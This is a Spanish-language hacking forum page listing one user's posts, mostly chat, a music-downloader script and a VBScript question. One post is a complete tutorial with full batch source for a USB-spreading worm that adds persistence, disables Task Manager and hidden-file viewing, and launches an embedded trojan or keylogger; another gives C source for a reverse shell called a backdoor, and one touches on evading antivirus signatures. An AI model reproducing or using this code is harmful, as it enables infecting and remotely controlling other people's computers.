últimos mensajes de: octalh

Mostrar Mensajes
Páginas: [1] 2 3 4 5

1	Foros Generales / Sugerencias y dudas sobre el Foro / Re: Llegó mi hora :(	en: 18 Mayo 2012, 23:00 pm
Tenia mucho de no pisar ya el foro pero en vdd que esto es una terrible noticia se te va extrañar mucho bro, almenos yo te voy a extrañar mucho tu sabes que siempre contaras con mi amistad, espero que después lo analices con mas calma y cambies de opinión, de cualquier forma te deseo mucha suerte y éxito, eres un genio y estoy más que seguro que conseguirás lo que buscas. En lo personal fuiste todo un maestro para mi, tienes toda mi admiración y respeto, es vdd que yo te invite al foro pero mira todo lo que creciste y en tan poco tiempo. Siempre fuiste la persona mas humilde incluso con todos tus logros y habilidades en muchas areas, has sido de los pocos amigos que no solo pasan sino que dejan huella, puedo contar con los dedos de las manos las personas que han sido y son importantes en mi vida y tu eres una de ellas. Espero que no te desaparezcas del todo y que te pases a saludar a tus amigos de la red de vez en cuando. - Un abrazo bro y muchos éxitos.

2	Foros Generales / Sugerencias y dudas sobre el Foro / Re: foro troyanos	en: 18 Junio 2008, 05:50 am
Citar El foro de troyanos y virus (mejor dicho el foro de lammers) A mi no me importa lo que los administradores o moderadores quieran hacer de su foro, solo decir que este tipo de comentarios tan absurdos reflejan muchas cosas menos el "nivel" tan elevado que dicen tener ahora. Empiecen por tener un poco de humildad y por respetar a los demas usuarios, o ya se les olvido que si esta "comunidad" crecio, es por los usuarios tan "lammers" que los visitan a diario? Si ustedes tienen un nivel tan avanzado los felicito pero eso no les da derecho a ridiculizar a mas gente o a hacerlos sentir menos. ahora me gustaria citar fraces de los usuarios tan superiores y avanzados que se dan el lujo de discriminar y ofender a otros. CITA DE raulrl Citar pd: cuando el nuevo foro se reestructure yo mismo podría crear un post con una recopilación de como usar el PI 2.3 y las FAQ si Man-in-the-Middle me deja. RESPUESTA DE EON Citar Precisamente ese tipo de lammeradas es lo que queremos eliminar, si alguien quiere hacerse el super-hax0r pasándole al PI el crypter indetectable de turno he infectar a mil personas que se vaya a otro foro. El cambio lo que pretende es precisamente evitar ese tipo de cosas, de ahí lo de no subir ejecutables y solo dar el código fuente. Citar Me pongo a mi mismo como ejemplo, no voy a liberar el código fuente del Small Crypter Público tiene sentido eso?? FIRMA DE EON Citar SMALL CRYPTER PRIVATE VERSION A LA VENTA!! PI & Bifrost 100% indetectables, stub de solo 4.5kb, cifrado rc4, source en asm y/o C a la venta y muchas cosas más... Ponte en contacto conmigo para más información. SCAN PI & BIFROST PRECIO: 60€, 100€ con source. Acaso eso no generara mas super-hax0r que tanto odian??? No tengo mas que decir, solo que creo que a muchos aqui se les subieron los humos a la cabeza y se les olvido tener un poco de humildad y respeto. Si me quieren banear por expresarme haganlo a decir verdad no me importa. salu2

Programación / Scripting / Downloader Musica en Batch

en: 23 Marzo 2008, 08:38 am

Bueno hice un pequeño script Batch que utiliza de motor Wget para descargar musica de GOEAR

les dejo el link de descarga del programa compilado junto con el codigo fuente

Código:

+-----+-----+-----+-----+-----+-----+-----+-----+-----+-----+-----+-----+-----+
                  ____        __  __                     ____    __     
 /'\_/`\         /\  _`\   __/\ \/\ \            /'\_/`\/\  _`\ /\ \    
/\      \  __  __\ \,\L\_\/\_\ \ \/'/'          /\      \ \ \L\_\ \ \   
\ \ \__\ \/\ \/\ \\/_\__ \\/\ \ \ , <    _______\ \ \__\ \ \  _\L\ \ \  
 \ \ \_/\ \ \ \_\ \ /\ \L\ \ \ \ \ \\`\ /\______\\ \ \_/\ \ \ \L\ \ \_\ 
  \ \_\\ \_\ \____/ \ `\____\ \_\ \_\ \_\/______/ \ \_\\ \_\ \____/\/\_\
   \/_/ \/_/\/___/   \/_____/\/_/\/_/\/_/          \/_/ \/_/\/___/  \/_/

                                         -----  |B|y| |O|c|t|a|l|h|  -----
-----+-----+-----+-----+-----+-----+-----+-----+-----+-----+-----+-----+-----+
[=========================]

  Software:  MuSiK-ME!
  Coder:     Octalh
  Ver:       1.0
  Language:  Batch
´ Resources: Wget
  Package:   UPX

[=========================]

Programa para descargar musica de Goear xD [ www.goear.com ]
Compilado con Quick Batch File Compiler y comprimido con UPX

##Codigo fuente incluido##

Nota: los audios se guardan en la carpeta "downloads"

[ DESCARGAR ]
http://www.badongo.com/file/8419210

SALU2

4	Informática / Tutoriales - Documentación / Re: HOW-TO Crear Gusano de Memorias USB en BATCH	en: 5 Marzo 2008, 19:46 pm
Gracias respecto a las imagenes ya las subi a otro servidor bueno por lo de algunas dudas que tenian el Código: REM AQUI SE CREA EL ARCHIVO AUTORUN ECHO [AUTORUN] >%AUTORUNORIGINAL% ECHO open=%WORM% >>%AUTORUNORIGINAL% ECHO shell\1=abrir >>%AUTORUNORIGINAL% ECHO shell\1\Command=%WORM% >>%AUTORUNORIGINAL% ECHO shell\2\=explorar >>%AUTORUNORIGINAL% ECHO shell\2\Command=%WORM% >>%AUTORUNORIGINAL% ECHO shellexecute=%WORM% >>%AUTORUNORIGINAL% es para crear el autorun.inf que posteriormente sera copiado a la memoria usb solo que si te confundes en %WORM% y %AUTORUNORIGINAL%, recuerda que estas son variables que definimos mas arriba que en este caso %AUTORUNORIGINAL% es igual a %WINDIR%\14785\WINUPDATE.DLL y WORM es igual a 1044404.EXE. Código: :LOOP REM UNA ESPECIE DE SLEEP XD DE PROX 60 SEGUNDOS ping 127.0.0.1 -n 60 GOTO CHEKARWORM ahora esta parte es una forma de poner un timer o un sleep, es para hacer tiempo.. si ya se que ese comando hace un ping , pero el ping lo hara 60 veces y si tomamos en cuenta que aprox cada peticion de ping tarda 1 segundo, pues es una forma de esperar 60 segundos. sirve para que el gusano verifique unidades aprox cada 60 segundos

5	Informática / Tutoriales - Documentación / HOW-TO Crear Gusano de Memorias USB en BATCH	en: 5 Marzo 2008, 04:47 am
HOW-TO CREA TU WORM EN BACTH Herramientas a utilizar: Quick_Batch_File_Compiler_3.1.5.0 que pueden descargar del siguiente enlace http://rapidshare.com/files/97127487/Quick_Batch_File_Compiler_3.1.5.0.rar.html Bueno en esta ocasión les tratare de explicar en breves palabras como crear su propio worm programado en batch. Considero que es una buena respuesta para todos aquellos que buscan programas ya hechos que hagan estas funciones, cuando resulta mas fácil aprender a programarse el suyo. Como se que muchos de aqui nunca en su vida han programado algo, a excepción de unos cuantos bats, pues queria poner de ejemplo un código para que puedan realizar sus propias pruebas y aprender por si solos. Aclaro que si eres programador, este manual definitivamente no te servirá, pero si eres alguien curioso que quiere aprender y no tiene idea de programación, este manual te puede ser de gran ayuda. Empezare dando una breve explicación de lo que hará nuestro worm y las funciones que realiza Básicamente lo que hará nuestro script es lo siguiente copiarse a si mismo a una carpeta en windows crear el autorun que posteriormente será copiado en la memoria extraible USB añadirse al inicio de windows alterar registro de windows para cancelar opciones del sistema ejecuta tu troyano, keylogger o lo que quieras si encuentra una unidad donde copiarse, se copia junto con su autorun se añade atributos de oculto, sistema y solo lectura espera aprox. 60 segundos y repite el ciclo de esta forma dotamos a nuestro programa de la habilidad de propagarse por si solo. con un poco de ayuda de la victima claro esta Bien ahora que sabes lo que el gusano hará te paso a explicar brevemente las funciones que utilice en el código SET Sirve para definir una variable, por ejemplo SET perro=firulais de esa forma podemos cambiar el nombre del perro sin tener que hacerlo en cada una de las expreciones donde hagamos referencia a firulais. ECHO Este comando basicamente sirve para "imprimir" en pantalla algun texto. ">" Este simbolo lo utilizamos para redirigir la salida de un comando, o tambien para comparar valores. En este caso la salida del comando ECHO la dirigimos hacia un archivo de texto IF NOT EXIST Este condicional se utiliza de la siguiente manera SI NO EXISTE ... ENTONCES HAS ESTO sirve para realizar acciones siempre y cuando se cumpla o no una condicion Los demas son comandos basicos de la shell de windows CMD.EXE Como funcionara el worm? bien lo que haremos sera utilizar la herramientas antes mencionada para compilarlo y obtener un EXE que se ejecute de manera OCULTA, de esa forma no tendremos problemas con la tipica pantalla negra de los batch el codigo del worm lo explique en cada sección. Código @ECHO OFF REM _______..___________. ___ .______ REM / \|\| \| / \ \| _ \ REM \| (----``---\| \|----` / ^ \ \| \|_) \| REM \ \ \| \| / /_\ \ \| / REM .----) \| \| \| / _____ \ \| \|\ \----. REM \|_______/ \|__\| /__/ \__\ \| _\| `._____\| REM ____ __ ____ ______ .______ .___ ___. REM \ \ / \ / / / __ \ \| _ \ \| \/ \| REM \ \/ \/ / \| \| \| \| \| \|_) \| \| \ / \| REM \ / \| \| \| \| \| / \| \|\/\| \| REM \ /\ / \| `--' \| \| \|\ \----.\| \| \| \| REM \__/ \__/ \______/ \| _\| `._____\|\|__\| \|__\| REM REM ____ ____ _________ ____ ____ ____ ____ ____ ____ REM \|\|B \|\|\|\|Y \|\|\|\| \|\|\|\|O \|\|\|\|C \|\|\|\|T \|\|\|\|A \|\|\|\|L \|\|\|\|H \|\| REM \|\|__\|\|\|\|__\|\|\|\|_______\|\|\|\|__\|\|\|\|__\|\|\|\|__\|\|\|\|__\|\|\|\|__\|\|\|\|__\|\| REM \|/__\\|\|/__\\|\|/_______\\|\|/__\\|\|/__\\|\|/__\\|\|/__\\|\|/__\\|\|/__\\| REM REM REM DESCRIPCION: Codigo en batch que copia un archivo "X" a "X" unidad REM [ OCTALH@GMAIL.COM ] REM REM +++++++++++ EDITA AQUI EL NOMBRE DEL WORM COMPILADO ++++++++++++++++ SET WORMORIGINAL=juego.exe REM NOMBRE QUE TIENE ACTUALMENTE TU BATCH COMPILADO SET WORM=1044404.EXE REM NOMBRE QUE TENDRA EN LA MEMORIA USB REM +++++++++++ EDITA AQUI EL NOMBRE DEL WORM COMPILADO ++++++++++++++++ SET AUTORUNORIGINAL=%WINDIR%\14785\WINUPDATE.DLL REM DIRECCION COMPLETA DEL AUTORUN ESCONDIDO SET AUTORUN=autorun.inf REM NOMBRE QUE TENDRA EN LA MEMORIA USB REM CREA UN DIRECTORIO EN LA CARPETA WINDOWS MD "%WINDIR%\14785" REM AQUI SE CREA EL ARCHIVO AUTORUN ECHO [AUTORUN] >%AUTORUNORIGINAL% ECHO open=%WORM% >>%AUTORUNORIGINAL% ECHO shell\1=abrir >>%AUTORUNORIGINAL% ECHO shell\1\Command=%WORM% >>%AUTORUNORIGINAL% ECHO shell\2\=explorar >>%AUTORUNORIGINAL% ECHO shell\2\Command=%WORM% >>%AUTORUNORIGINAL% ECHO shellexecute=%WORM% >>%AUTORUNORIGINAL% REM COPIA EL WORM A EL DIRECTORIO DE WINDOWS PARA OCULTARLO COPY %WORMORIGINAL% "%WINDIR%\14785\SYSTEMSHELL.exe" REM EJECUTA TU SERVER START %MYFILES%\server.exe REM SE AGREGA AL INICIO DEL SISTEMA REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuaclt.exe /t REG_SZ /d "%WINDIR%\14785\SYSTEMSHELL.exe" /f REM SE DESACTIVA EL ADMINISTRADOR DE TAREAS REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d "1" /f REM SE DESACTIVA LA OPCION DE VER ARCHIVOS OCULTOS REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN /v CheckedValue /t REG_DWORD /d "2" /f :CHEKARWORM REM VERIFICA LA EXISTENCIA DEL WORM IF NOT EXIST "D:\%WORM%" GOTO COPIARWORM IF NOT EXIST "E:\%WORM%" GOTO COPIARWORM IF NOT EXIST "F:\%WORM%" GOTO COPIARWORM IF NOT EXIST "G:\%WORM%" GOTO COPIARWORM IF NOT EXIST "H:\%WORM%" GOTO COPIARWORM IF NOT EXIST "I:\%WORM%" GOTO COPIARWORM IF NOT EXIST "J:\%WORM%" GOTO COPIARWORM :COPIARWORM REM COPIA EL WORM Y LE ASIGNA ATRIBUTOS DE SOLO LECTURA REM SISTEMA Y OCULTO. COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "E:\%WORM%" ATTRIB +S +H +R "E:\%WORM%" COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "F:\%WORM%" ATTRIB +S +H +R "F:\%WORM%" COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "G:\%WORM%" ATTRIB +S +H +R "G:\%WORM%" COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "H:\%WORM%" ATTRIB +S +H +R "H:\%WORM%" COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "I:\%WORM%" ATTRIB +S +H +R "I:\%WORM%" COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "J:\%WORM%" ATTRIB +S +H +R "J:\%WORM%" REM COPIADO DEL AUTORUN Y ASIGANCION DE ATRIBUTOS COPY "%AUTORUNORIGINAL%" "E:\%AUTORUN%" ATTRIB +S +H +R "E:\%AUTORUN%" COPY "%AUTORUNORIGINAL%" "F:\%AUTORUN%" ATTRIB +S +H +R "F:\%AUTORUN%" COPY "%AUTORUNORIGINAL%" "G:\%AUTORUN%" ATTRIB +S +H +R "G:\%AUTORUN%" COPY "%AUTORUNORIGINAL%" "H:\%AUTORUN%" ATTRIB +S +H +R "H:\%AUTORUN%" COPY "%AUTORUNORIGINAL%" "I:\%AUTORUN%" ATTRIB +S +H +R "I:\%AUTORUN%" COPY "%AUTORUNORIGINAL%" "J:\%AUTORUN%" ATTRIB +S +H +R "J:\%AUTORUN%" GOTO LOOP :LOOP REM UNA ESPECIE DE SLEEP XD DE PROX 60 SEGUNDOS ping 127.0.0.1 -n 60 GOTO CHEKARWORM bien ahora explicare como utilizar el codigo. lo primero sera fijarce en esta parte del codigo Código: SET WORMORIGINAL=juego.exe REM NOMBRE QUE TIENE ACTUALMENTE TU BATCH COMPILADO SET WORM=1044404.EXE REM NOMBRE QUE TENDRA EN LA MEMORIA USB Es indispensable que la variable WORMORIGINAL=juego.exe tenga el mismo nombre que el worm unaves compilado con QUICK BATCH FILE COMPILER Tambien verifica esta parte del codigo Código: REM EJECUTA TU SERVER START %MYFILES%\server.exe aqui donde dice server.exe tiene que tener el mismo nombre que el archivo a adjuntar en el QUICK BATCH FILE COMPILER. Para compilar tu worm solo tienes que copiar el codigo en el QUICK BATCH FILE COMPILER te debe quedar algo asi Ahora haremos que se ejecute de forma oculta, para eso nos vamos a project, optiones y activamos la opcion Gost aplication Ahora debes agregar tu aplicacion a propagar, puede ser un server de troyano, keylogger etc etc... para eso vamos a la pestaña Embedded Files y damos click en el icono de la cruz verde y posteriormente añadimos nuestra aplicacion, tambien pueden agregar un icono personalizado en esta pestaña. recuerda que este archivo se debe llamar como lo indicaste en Código: REM EJECUTA TU SERVER START %MYFILES%\server.exe ahora precionamos F9 para compilarlo y listo!!, ahora tienes tu propio worm programado en batch. Bien con esto llegamos al final de esta pequeña guia, espero que haya sido de tu agrado y cualquier cosa puedes comentar en el foro. SALU2 y suerte

6	Programación / Programación Visual Basic / Re: copiar archivo en vbscript a "X" unidad	en: 26 Noviembre 2007, 02:50 am
me kontesto a mi mismo solo tenia que agregar el Drive.DriveLetter antes del patch Thanks anyway

7	Programación / Programación Visual Basic / copiar archivo en vbscript a "X" unidad	en: 25 Noviembre 2007, 23:41 pm
Hola estoy haciendo un script que copia un archivo desde C a una unidad extraible antes usaba el metodo de Código: If objFSO.FolderExists("UNIDAD_EXTRAIBLE:\") Then objFSO.CopyFile "file.ini" , "UNIDAD_EXTRAIBLE:\file.ini", OverwriteExisting pero no me gustaba puesto que este metodo solo verifica que exista dicha unidad sin importar si sea extraible o no entonces despues halle este code Código: Const DriveTypeRemovable = 1 Set oFS = Wscript.CreateObject("Scripting.FileSystemObject") Set oDrives = oFS.Drives 'Loop thru A-Z. If found, exit early. For Each Drive in oDrives If Drive.DriveType = DriveTypeRemovable Then If Drive.DriveLetter <> "A" Then Wscript.Echo "Don't forget your thumb drive! " + Drive.DriveLetter End If End If Next ese codigo te da un aviso si tienes un medio extraible conectado (pendrives, ipod, etc..) lo que quiero hacer es que por ejemplo si detecta una unidad extraible sin importar cual sea copie dicho archivo desde C a la unidad extraible el problema es que no se como indicarle al codigo que el destino sea "X" unidad algo asi como: Código: Set oFile = oFS.GetFile("C:\archivo") oFile.Copy (CUALQUIER_UNIDAD_EXTRAIBLE"\archivo"), true gracias

8	Programación / Programación Visual Basic / Re: [Propuesta] Offset's Detector...	en: 20 Mayo 2007, 21:06 pm
Citar Normalmente los archivos se parten con el olly (me lo enseñó octalh) no se parten con olly eso nunca te lo dije, se partian con un editor HEX y con olly se hacen redirecciones de flujo para alterar las firmas. se llama metodo RITes todo nada del otro mundo. esa screenshot fue cuando hice unas pruebas con wollf pero desgraciadamente esta super atascado de firmas por todos lados. acabe haciendo el rit en backdoors menos conocidas.. EL METODO ES 100% FUNCIONAL salu2

Seguridad Informática / Nivel Web / Re: Problema haciendo un RFI

en: 2 Abril 2007, 07:32 am

buen backdoor

aki otro code +

Código:

/* Writed by Rozor !Sub_Level */
/* irc-hispano.org #sub_level ( xZR ) */
/* http://sincontrol.tomahost.org */
/* on C/C++ for Linux*/
/* gcc XZrshell.c -o XZrshell */
/* Name ID = /bin/cat */

   
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>



    int main()
    {
        int sck;
        struct sockaddr_in rhost;
        char *IP = "127.0.0.1"; /* Direccion ip */
        unsigned short PORT = 666; /* Puerto */
       
        rhost.sin_family = AF_INET;
        rhost.sin_port = htons(PORT);
        rhost.sin_addr.s_addr = inet_addr("127.0.0.1");
        memset(&(rhost.sin_zero), '\0', 8);
       
        sck = socket(AF_INET, SOCK_STREAM, 0);
        connect(sck, (struct sockaddr *)&rhost, sizeof(rhost));
     
       if(!fork())
       {

        setsid();
        dup2(sck, 0);
        dup2(sck, 1);
        dup2(sck, 2);       
        dup2(sck, 3);
        dup2(sck, 4);
        dup2(sck, 5);
        execl("/bin/bash", "/bin/cat", NULL);
        close(sck);
     
      }


}

es bastante sencillo pero practiko tambien

bytes

10	Seguridad Informática / Hacking / Re: Jugando con netcat	en: 1 Abril 2007, 23:16 pm
jaja nunca se me ocurrio hacerlo en modo pipeado buen tip neox

Páginas: [1] 2 3 4 5